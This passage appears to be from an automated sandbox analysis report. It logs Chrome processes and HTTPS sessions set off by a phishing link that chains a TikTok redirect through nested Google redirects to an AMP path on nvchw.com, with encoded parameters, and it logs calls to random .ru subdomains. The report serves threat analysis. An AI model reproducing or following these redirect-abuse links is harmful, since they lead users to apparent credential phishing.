                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:30 UTC375INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:37:30 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: 5UE9n+ot+lQFKzGP/2cAEg==$fx6RpS8l98GaQ5rN2ni01Q==
                                                                  Server: cloudflare
                                                                  CF-RAY: 901887273b92c481-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:30 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.1649753104.21.42.2084437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:31 UTC663OUTGET /34312312326475845lHPzVpHAawKXAPUEABCCOMUVHMSYIMKTEGPFLJPNZNM HTTP/1.1
                                                                  Host: ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://m7sn.shaceshrov.ru
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://m7sn.shaceshrov.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:31 UTC890INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DG9djDQ6NS9R6YcwZpW7JxH4Ug4YL2MKCzCPe6Kg7ZQAPn3N52Mo2U%2Bh910ibitdG0bYIibLghm1ivjNCxCDxYA99e2eT60r8v6fHG5e%2F4SAcX06pmaIkSGEevrCdnEcwJJ8oUoSA3l5AorOGDH2qPeyNF8aJwmPmCBczEDmbed0Vn9u6GxYbkgYG4jwKbN8vXmY2NKPBV0%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9018872b5deb0c82-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1515&rtt_var=578&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1241&delivery_rate=1875401&cwnd=208&unsent_bytes=0&cid=6c5b335b30535d3c&ts=612&x=0"
                                                                  2025-01-13 21:37:31 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                  Data Ascii: 11
                                                                  2025-01-13 21:37:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.1649756104.21.42.2084437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:32 UTC453OUTGET /34312312326475845lHPzVpHAawKXAPUEABCCOMUVHMSYIMKTEGPFLJPNZNM HTTP/1.1
                                                                  Host: ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:33 UTC898INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ch8ZuacNpUdT5ear3qq0rwX3rFfeWQRPJclAn%2BwmBTbhm7fdN7p7x59PJ2mkGQupgUbHa5mGF5BfRuWgo2kOFtEsUm%2Fs%2BAn6eU8ERoO0autoV6E%2FXGD98L9h3SjzZrCluMwRlQJAz1pupO%2FFy9WPjzl2SnfUlrjNlhl8tmDltW1cizR%2FSVh0OUDavvcnsJRYuZWXzSIZXeY%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 90188732fb28425d-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1589&rtt_var=619&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1031&delivery_rate=1737061&cwnd=199&unsent_bytes=0&cid=3af6ff7717a5054f&ts=589&x=0"
                                                                  2025-01-13 21:37:33 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                  Data Ascii: 11
                                                                  2025-01-13 21:37:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:16:37:08
                                                                  Start date:13/01/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                  Imagebase:0x7ff7f9810000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:1
                                                                  Start time:16:37:08
                                                                  Start date:13/01/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1908,i,14219803706752478215,14568198449669623511,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                  Imagebase:0x7ff7f9810000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:16:37:09
                                                                  Start date:13/01/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm"
                                                                  Imagebase:0x7ff7f9810000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  No disassembly